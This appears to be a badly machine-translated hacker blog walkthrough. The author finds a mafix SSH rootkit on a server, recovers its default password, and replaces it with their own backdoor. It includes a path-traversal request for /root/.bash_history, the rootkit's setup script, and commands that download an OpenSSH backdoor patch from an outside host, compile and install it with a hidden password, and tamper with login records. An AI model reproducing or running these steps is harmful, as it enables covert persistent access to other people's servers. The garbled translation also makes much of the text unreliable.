Yaseng sent a packet containing ROOT permission for running and HTTPD such
DumbDraft? Tender BWhat is HTTPD with the ROOT permission of the J8 administrator? Isn't this clearly a day? Drafting? B's dumb.
It is intended to break HASH without CPU GUP
Okay, this is a dumb. Continue to check if NAMP has scanned me. It seems like there is one.DumbA hacker installs a backdoor.
What's the time when sshd v1 was used? Aren't you a shame ?? LINK TEST
- Brk <~> $ Ssh root @ xxoo-1 # SSH on port 22
- Protocol major versions differ: 1 vs. 2
- Brk <~> $ Ssh root @ xxoo-p 2010-1 # port 2012 SSH low-level version suspect Backdoor
- Root @ xxoo's password:
It is estimated that mafix SSH backdoor has been downloaded under the microscopic
Http://lucky.fuzzexp.org/file/r00tk1t/mafix.tar_shit.gz
SeeSSHDIR =/lib/libsh. soIncluding the read.DumbBackdoor
Find the password ~~
First look At the ROOT log source: http://fuzzexp.org/check_rk.html
- GET/sc8/photodownload? Filepath = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /root/. bash_history000000.html HTTP/1.1
I cannot find it. It is estimated to be-c.
Analyze the source code of ROOTKIT to see how the password is handled.
- Brk <~ /Desktop/ddrk> $ head setup
- #! /Bin/bash
-
- ########## Define variables ##########
- DEFPASS = 123456
- VPC: DEFPORT = 43958
- BASEDIR = 'pwd'
- SSHDIR =/lib/libsh. so
- HOMEDIR =/usr/lib/libsh
The variable is DEFPASS.
Search
- Brk <~ /Desktop/ddrk> $ cat setup | grep DEFPASS
- DEFPASS = 123456
- Echo "No Password Specified, using default-$ DEFPASS"
- Echo-n $ DEFPASS | md5sum>/etc/sh. conf
- Brk <~ /Desktop/ddrk> $
The village is in/etc/sh. conf. MD5 encryption has fallen. Read it.
Your mom's BB and then MD5 decryption...
Logon successful
Next, delete the hacker's backdoor and keep my own backdoor as follows: install OPENSSH .. Source: http://fuzzexp.org/check_rk.html
- [Root @ SH-crew:/root] # ssh-v
- OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
- Usage: ssh [-1246 AaCfgkMNnqsTtVvXxY] [-B bind_address] [-c cipher_spec]
- [-D [bind_address:] port] [-e escape_char] [-F configfile]
- [-I identity_file] [-L [bind_address:] port: host: hostport]
- [-L login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
- [-R [bind_address:] port: host: hostport] [-S ctl_path]
- [-W tunnel: tunnel] [user @] hostname [command]
- [Root @ SH-crew:/root] #
Download the source code ..
- [Root @ SH-crew:/root] # cd/tmp/
- [Root @ SH-crew:/tmp] # mkdir...
- [Root @ SH-crew:/tmp] # cd...
- [Root @ SH-crew:/tmp/...] # wget http://64studio.hivelocity.net/apt/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
- [Root @ SH-crew:/tmp/...] # tar xf openssh_4.3p2.orig.tar.gz
- [Root @ SH-crew:/tmp/...] # cd openssh-4.3p2/
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] # wget http://lucky.fuzzexp.org/file/r00tk1t/openssh-5.5p1.patch/sshbd5.5p1.diff
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] # patch <sshbd5.5p1. diff
- Patching file auth. c
- Hunk #1 succeeded at 243 (offset-28 lines ).
- Patching file auth-passwd.c
- Hunk #1 succeeded at 113 (offset-9 lines ).
- Patching file canohost. c
- Hunk #1 succeeded at 60 (offset-18 lines ).
- Patching file except des. h
- Hunk #1 succeeded at 211 (offset 39 lines ).
- Patching file sshconnect2.c
- Hunk #1 succeeded at 736 with fuzz 2 (offset-80 lines ).
- Patching file sshlogin. c
- Hunk #1 succeeded at 112 (offset-21 lines ).
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] #
Next, edit the password and SSH Login and logout record file compilation.
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] #./configure-prefix =/usr-sysconfdir =/etc/ssh
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] # make & make install
Restart and log out of SSH
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] # nano/etc/ssh/sshd_config
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] # nano/etc/ssh/ssh_config
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] #/etc/init. d/sshd restart
- [Root @ SH-crew:/tmp/.../openssh-4.3p2] exit
Then log on to 22 and enter the backdoor password Helenv5.
RightDumbThe hacker's backdoor has been deleted.
- [Root @ viewjpklibsh] # chmod-R 000 *
- [Root @ viewjpklibsh. so] # chmod-R 000 *
Port closed
- [Root @ viewjpklibsh] # iptables-I INPUT-j DROP-p tcp-dport 2010
- [Root @ viewjpklibsh] # iptables-save
Test Link
- Brk <~ /Files/ssh> $ nc-vv xxxxxxxxxxxxx 2010
- Connection to xxoo 2010 port [tcp/search] succeeded!
- SSH-1.5-2.0.13
- ^ C
- Brk <~ /Files/ssh> $ nc-vv xxxxxx 2010
Unable to connect
Delete the MOD. Don't ask me what I know.DumbRK only uses this source: http://fuzzexp.org/check_rk.html
- [Root @ viewjpklibsh] # modprobe-r ehci-hcd
Finally, send a picture ....